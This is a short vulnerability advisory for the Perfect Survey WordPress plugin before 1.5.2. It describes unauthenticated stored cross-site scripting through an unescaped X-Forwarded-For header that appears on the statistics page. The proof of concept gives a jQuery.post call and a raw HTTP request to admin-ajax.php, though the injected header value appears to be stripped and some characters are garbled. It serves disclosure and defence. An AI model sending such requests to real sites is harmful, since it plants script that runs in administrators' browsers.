Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting

The plugin does not validate and escape the X-Forwarded-For header value before outputting it in the statistic page when the Anonymize IP setting of a survey is turned off, leading to a Stored Cross-Site Scripting issue

PoC

jQuery.post({data:{ ps_questions:{1:[“1”]}, action:“save_question_data”, ID:“765”, },url:“https://example.com/wp-admin/admin-ajax.php",headers:{“X-Forwarded-For”:"”}}) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Forwarded-For: X-Requested-With: XMLHttpRequest Content-Length: 60 Connection: close ps_questions%5B1%5D%5B%5D=1&action;=save_question_data&ID;=765 Then go to https://example.com/wp-admin/edit.php?post_type=ps&amp;page;=single_statistic&amp;id;=765